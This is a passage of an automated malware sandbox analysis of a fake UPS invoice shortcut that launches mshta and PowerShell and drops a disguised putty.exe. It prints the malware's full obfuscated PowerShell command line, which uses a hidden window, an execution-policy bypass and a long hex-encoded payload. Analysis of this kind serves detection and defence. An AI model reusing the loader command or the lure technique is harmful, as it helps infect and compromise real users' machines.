Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\putty.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Invoice-UPS-218931.pdf.lnk.mal.lnkLNK file: ..\..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\putty.exeWindow detected: Number of UI elements: 20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780501830.0000023F9E075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780052517.0000023F9E0D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793809350.0000023F9E076000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780480215.0000023F9A1E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr
Source: Binary string: .pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E5612763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB Jump to behavior
Source: invoiceupsstage[1].4.drStatic PE information: real checksum: 0x9660 should be: 0x361dc
Source: invoiceupsstage[1].4.drStatic PE information: section name: .didat
Source: putty.exe.7.drStatic PE information: section name: .00cfg
Source: putty.exe.7.drStatic PE information: section name: .gxfg
Source: putty.exe.7.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFB49B2919D push E85B7B00h; ret 7_2_00007FFB49B291F9

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\putty.exeJump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]Jump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.lnkStatic PE information: Invoice-UPS-218931.pdf.lnk.mal.lnk
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D9610 IsIconic,SetWindowTextW,SetWindowTextA,12_2_00007FF6785D9610
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D96E0 IsIconic,SetWindowTextW,SetWindowTextA,12_2_00007FF6785D96E0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D97B0 IsIconic,ShowWindow,12_2_00007FF6785D97B0
Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 12_2_00007FF6785D51DF RegisterClipboardFormatA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitialize,MessageBoxA,12_2_00007FF6785D51DF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
